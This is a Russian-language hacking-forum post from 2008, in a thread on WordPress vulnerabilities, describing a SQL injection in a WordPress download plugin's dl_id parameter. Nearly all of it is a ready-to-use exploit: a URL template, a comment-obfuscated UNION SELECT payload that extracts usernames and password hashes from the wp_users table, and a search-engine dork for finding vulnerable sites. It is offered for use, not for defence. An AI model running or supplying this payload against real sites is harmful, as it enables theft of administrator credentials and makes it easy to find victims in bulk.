Тема: [ Обзор уязвимостей WordPress ]
Показать сообщение отдельно

Wordpress Plugin Download (dl_id) SQL Injection Vulnerability
  #48  
Старый 01.04.2008, 00:14
Аватар для Solide Snake
Solide Snake
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
По умолчанию Wordpress Plugin Download (dl_id) SQL Injection Vulnerability
Wordpress Plugin Download file Remote SQL Injection Vulnerability

Код:
Example:
http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]
SQL:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*
Для поиска:

Код:
inurl:"wp-download.php?dl_id="
(c)
 
Ответить с цитированием